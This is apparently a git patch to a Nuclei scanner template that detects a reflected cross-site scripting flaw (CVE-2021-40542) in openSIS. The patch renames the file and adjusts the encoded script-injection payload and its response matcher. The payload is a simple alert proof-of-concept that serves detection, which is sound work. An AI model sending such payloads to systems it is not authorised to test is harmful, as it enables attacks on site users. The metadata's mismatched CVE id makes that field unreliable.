From 0457cbd6b28e3de455431afba7449a80025fd2f8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 3 Dec 2021 12:42:37 +0530
Subject: [PATCH] Update and rename CVE-2021-40542.yaml to
 cves/2021/CVE-2021-40542.yaml

---
 CVE-2021-40542.yaml => cves/2021/CVE-2021-40542.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
 rename CVE-2021-40542.yaml => cves/2021/CVE-2021-40542.yaml (82%)

diff --git a/CVE-2021-40542.yaml b/cves/2021/CVE-2021-40542.yaml
similarity index 82%
rename from CVE-2021-40542.yaml
rename to cves/2021/CVE-2021-40542.yaml
index 2d68cc5fc2..ca8d260c4f 100644
--- a/CVE-2021-40542.yaml
+++ b/cves/2021/CVE-2021-40542.yaml
@@ -8,24 +8,24 @@ info:
   reference:
     - https://github.com/OS4ED/openSIS-Classic/issues/189
     - https://nvd.nist.gov/vuln/detail/CVE-2021-40542
-  tags: xss,cve,cve2021,opensis
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.10
     cve-id: CVE-2021-38704
     cwe-id: CWE-79
+  tags: xss,cve,cve2021,opensis
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/Ajax_url_encode.php?link_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "<script>alert(document.domain)</script>"
+          - "</script><script>alert(document.domain)</script>"
 
       - type: word
         part: header